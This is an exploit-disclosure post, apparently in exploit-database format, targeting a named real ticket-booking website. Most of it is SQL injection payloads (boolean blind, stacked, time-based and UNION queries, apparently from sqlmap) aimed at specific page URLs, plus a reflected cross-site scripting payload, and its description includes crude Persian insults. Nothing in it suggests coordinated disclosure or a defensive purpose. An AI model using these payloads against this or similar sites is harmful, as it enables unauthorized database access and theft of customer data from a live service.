Exploit title: vark.ir - Multiple Vulnerability
Exploit author: amin
Date: Thursday - 2020 23 January
Tested on: Ubuntu 19.10 x64
-------------------------------------
[ Description ]
this site is for selling flying tickets va .... rajebe site kos o sher minevisi .
[ POC | Proof of Concept ]
SQL injection :
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 7313=7313
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=3;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 2500 FROM (SELECT(SLEEP(5)))czHg)
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=3 UNION ALL SELECT NULL,NULL,CONCAT(0x7178717671,0x744a4743496a785465676f4a6a53486364785a4751716544566b4c4654446b426a47466c654a4a64,0x7162717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZTJb
http://vark.ir/show-hotel.php?id=[SQLi]
http://vark.ir/project.php?id=[SQLi]
XSS :
Cross Site-Scripting
file : show-hotel.php
parameter : id
payload : "><script>alert('XSS')</script>
dar payan ham esm refighat miyary .